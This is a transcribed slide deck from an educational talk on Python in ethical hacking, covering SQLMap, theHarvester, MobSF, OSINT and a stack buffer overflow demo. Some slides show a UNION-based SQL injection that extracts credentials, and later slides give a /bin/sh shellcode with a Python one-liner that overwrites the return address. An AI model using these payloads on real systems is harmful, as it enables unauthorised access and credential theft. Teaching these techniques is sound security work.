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The Importance of Python for Ethical Hacking

The Importance of Python for Ethical Hacking

you know, you could do magic with python even for fun

Yahya Fadhlulloh Al-Fatih

December 04, 2021

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  1. !! DISCLAIMER !! - All on this presentation is for

    informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. - Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking.The author is not promoted hacking or cracking. - Do not attempt to violate the law with anything contained here. - You shall not misuse the information to gain unauthorised access. However you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal. Thanks to my wife and my friend that makes this presentation happen 2
  2. Hello! I AM YAHYA F. ALFATIH Engineer Lead at eFishery

    Love to automate anything DevOps, SoftEng & CyberSec Researcher OSS&Web3 Enthusiast Creator of NeMo, BigBrother Test and other Junk 3 buk4nyahya A lazy abnormal tech savy. @BukanYahya k1m0ch1
  3. 2021 Hacking ? $2M bug bounty Profitable professional working on

    the internet (https://decrypt.co/83997/polygon-dodges-850m-hack-pays-re cord-2m-bounty) Cybercrime-as-service Crime as easy as you manage spreadsheet 4
  4. 5

  5. Hacking & Ethical Hacking The differences where hackers activity is

    using ethic code or not Easy + Hack = Python The only language hackers commonly easy to use 6
  6. Language used for exploit in exploit-db.com (from 45k record): 64

    JAVA 1144 PHP 1894 HTML 2822 Perl 2956 C 3870 Python 1999+ Text 8
  7. So why hackers commonly use python ? Hacking Tools It

    is used by SQLMap, theHarvester and MobSF Productive & Speedy The most accessible programming languages available Wide Community Hackers community really can help with python Easy PoC Its not hard to Proof of Concept of the vulnerability or CVE ByteCode Shell Inject Fun with buffer0verlow ? try python For Fun! 🤣🤣🤣🤣 11
  8. Common Hackers tools written with python SQLMap theHarvester MobSF 13

    This tools very common around hackers for sqlinjection, OSINT and debug the android apps
  9. SQLMap - Automatic SQL Injection and database take over This

    tools can detect all of the variant of sql injection with more than 100 sql injection payload, it has more feature than that from explore database to dump the database 14
  10. SQL injection there is an attack method that usually hackers

    use to trick the application to execute any command on the Database, from this kind of query that simply select the news like this 15 select * from news where news_id=5
  11. SQL injection Into something that select other table, that store

    more sensitive information like this 16 select * from news where news_id=5 union select 1,2,concat(username,0x3a,password),4,5 from credentials This is only one variant of the sql injection from the 9 variant of sql injection with more than 100 sql injection payload, you can see full in here https://github.com/payloadbox/sql-injection-payload-list
  12. Fix SQL injection Because sql injection is commonly involve with

    data input, so it is only need to sanitize the input, so the hackers can’t manipulate the query 17
  13. theHarvester - the internet gold miner tools This is a

    very cool tools to dig a gold mine on the internet, the tools is simple, you just put the domain and it will search “ANY” information on the internet, even the sensitive one. How it work ? it is only use the search engine, from common search engine google, duck duck go, bing and the speciality search engine, GHDB, shodan and zoomeye and all of this commonly call OSINT 18
  14. OSINT - Open Source Intelligence A process mostly used for

    collecting the publicly available source for intelligence context, you can try this by simply using the specific keyword on google or usually hackers call this GHDB (Google Hacking DB). Professionally a person who can do this is called the investigator 19
  15. MobSF - Mobile Security Framework This tools can analyze, decompile,

    sniffing the API and do many things to analyze the Android application, it has a two great feature, Static Analysis and Dynamic Analysis 21
  16. How Powerful MobSF ? I made the analysis of the

    Peduli Lindungi Application on twitter, github and youtube that peduli lindungi application actually send the “unusual” data to “untrusted tracker” 22
  17. Mentimeter - interactive tools to vote 24 Some people or

    group love to use this tools as interactive tools for voting or just some fun with group
  18. 29 kernel stack heap data text 0xffffff... 0x000... Int main

    ().. parameters return base pointer buffer(80) 0x000... 0xffffff...
  19. 30 Int main ().. parameters return base pointer buffer(80) 0x000...

    0xffffff... 8 bytes 0x70 = p 0x61 = a 0x73 = s 0x73 = s 0x77 = w 0x6f = o 0x72 = r 0x64 = d
  20. 33 Int main ().. parameters return base pointer buffer(80) 0x000...

    0xffffff... 0x7fffffffe490 - 0x7fffffffe4d8
  21. 36 Int main ().. parameters return base pointer buffer(80) 0x000...

    0xffffff... 0x7fffffffed60 \x31\xc0\x48\xbb\xd1\x9d\x96\x91\x d0\x8c\x97\xff\x48\xf7\xdb\x53\x54\ x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0 f\x05 27 bytes shell code /bin/sh http://shell-storm.org/shellcode/files/shellcode-806.php $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7 \xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 63')
  22. 38 Int main ().. parameters return base pointer buffer(80) 0x000...

    0xffffff... 0x7fffffffe480 0x7fffffffe480 \x80\xe4\xff\xff\xff\x7f Memory address $(python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7 \xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 61 + “\x80\xe4\xff\xff\xff\x7f”’)
  23. 48

  24. The Bug and how to fix it 1. “REAL” Separate

    network 2. HTTPS EVERYWHERE, even LAN 3. Token Expiration 60
  25. Thanks to! 62 Computerphile Youtube Channel Youtube videos about computer

    and internet stuff LiveOverflow Wannabe hacker.. Youtube video about various IT security topics Habibie Faried Hacker Buddy He mades a good article on medium https://habibiefaried.mediu m.com/ sec_r0 Gojektech security engineer He made a lot of cool stuff with his simple explanation image